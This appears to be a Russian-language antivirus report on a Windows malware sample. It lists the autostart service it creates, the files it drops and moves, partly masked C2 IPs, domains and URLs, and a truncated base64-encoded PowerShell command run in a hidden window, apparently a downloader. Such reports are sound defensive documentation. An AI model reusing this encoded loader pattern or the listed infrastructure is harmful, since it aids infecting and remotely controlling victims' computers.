Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\FXSCOM] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\FXSCOM] 'ImagePath' = '"%WINDIR%\SysWOW64\iashlpr\FXSCOM.exe"'
Создает следующие сервисы
- 'FXSCOM' "%WINDIR%\SysWOW64\iashlpr\FXSCOM.exe"
- 'FXSCOM' %WINDIR%\SysWOW64\iashlpr\FXSCOM.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABUADMAaABmAHMAOAB5AD0AKAAoACcARwA2ACcAKwAnAHIAJwArACcAMQA0AG0AJwApACsAJwB3ACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAVQBzAEUAcgBwAHIATwBGAEkATABFAFwAbQAzAFkAZg...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\m3yfa09\fedmqsu\k2ngq9rh.exe
Удаляет следующие файлы
- %HOMEPATH%\m3yfa09\fedmqsu\k2ngq9rh.exe
Перемещает следующие файлы
- %HOMEPATH%\m3yfa09\fedmqsu\k2ngq9rh.exe в %WINDIR%\syswow64\iashlpr\fxscom.exe
Подменяет следующие файлы
- %HOMEPATH%\m3yfa09\fedmqsu\k2ngq9rh.exe
Сетевая активность
Подключается к
- '17#.#13.69.136':80
- '51.##.124.206':80
TCP
Запросы HTTP GET
- http://th###work.com/mail.theccwork.com/IJp/
Запросы HTTP POST
- http://51.##.124.206/aTDQQETIcHbiL2bm8Vl/64T0jcJ0Ii1wo6HVv/CSDjVMxS28NmWf1O1/ERR02kK9y/
UDP
- DNS ASK th###work.com
- DNS ASK re######ntprofessional.com
- DNS ASK wr#####fromling.live
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABUADMAaABmAHMAOAB5AD0AKAAoACcARwA2ACcAKwAnAHIAJwArACcAMQA0AG0AJwApACsAJwB3ACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAVQBzAEUAcgBwAHIATwBGAEkATABFAFwAbQAzAFkAZg...' (со скрытым окном)
